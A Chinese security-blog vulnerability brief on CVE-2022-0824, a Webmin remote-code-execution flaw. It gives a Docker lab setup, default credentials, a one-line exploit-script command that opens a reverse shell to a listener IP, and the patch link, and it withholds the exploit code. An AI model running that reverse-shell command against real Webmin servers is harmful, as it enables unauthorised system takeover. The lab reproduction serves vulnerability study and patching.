【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞

admin 2022年12月8日13:20:18评论48 views字数 1084阅读3分36秒阅读模式

0x01 简介

——

Webmin 是一个基于 Web 的 Unix 系统管理界面。使用任何现代网络浏览器,您可以设置用户帐户、Apache、DNS、文件共享等等。在 1.990 之前的GitHub存储库webmin/webmin中对远程代码执行的访问控制不当。


简单地说,就是你可以打开一个浏览器,然后输入 Webmin 的管理地址,在打开的页面中就可以管理你的 Linux/Unix 系统了。

Webmin 功能强大,可以管理设置很多东西,比如用户帐户、Apache 服务、DNS 、文件共享等等,几乎所有的东西都能给你管上一管。

Webmin 是由一个简单的 Web 服务器和一些 CGI 程序组成的系统,Web 服务器和所有 CGI 程序都是使用 Perl 5,并且不使用非标准的 Perl 模块。

它通过管理相应的系统配置文件来实现管理目的,比如它直接通过访问编辑 /etc/passwd 来管理用户密码等等。


【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞


0x02漏洞编号

——

CVE编号:CVE-2022-0824CNVD编号:CNVD-2022-17023CNNVD编号::CNNVD-202203-076

0x03 影响版本


Webmin Webmin < Webmin Webmin1.990    1.990版本之前均受影响

0x04 环境搭建

——

直接本地docker搭建命令

docker pull vulfocus/webmin_cve-2022-0824:latestdocker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824

【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞

也可直接vulfocus平台启动环境

【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞

环境搭建成功访问如下

【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞

username=rootpassword=password

【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞


0x05 漏洞复现

——

利用脚本直接反弹shell

python3 Webmin-revshell.py -t http://192.168.232.140:10000 -c root:password -LS 192.168.232.138:9090 -L 192.168.232.138 -P 9999 

【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞


反弹shell成功

【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞


0x06 修复方案

——


更新到最新版本 附带厂商补丁链接:https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38



0x07 EXP获取方式


点击下方名片回复"20221207"获取

原文始发于微信公众号(渗透Xiao白帽):【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月8日13:20:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞https://cn-sec.com/archives/1451790.html

发表评论

匿名网友 填写信息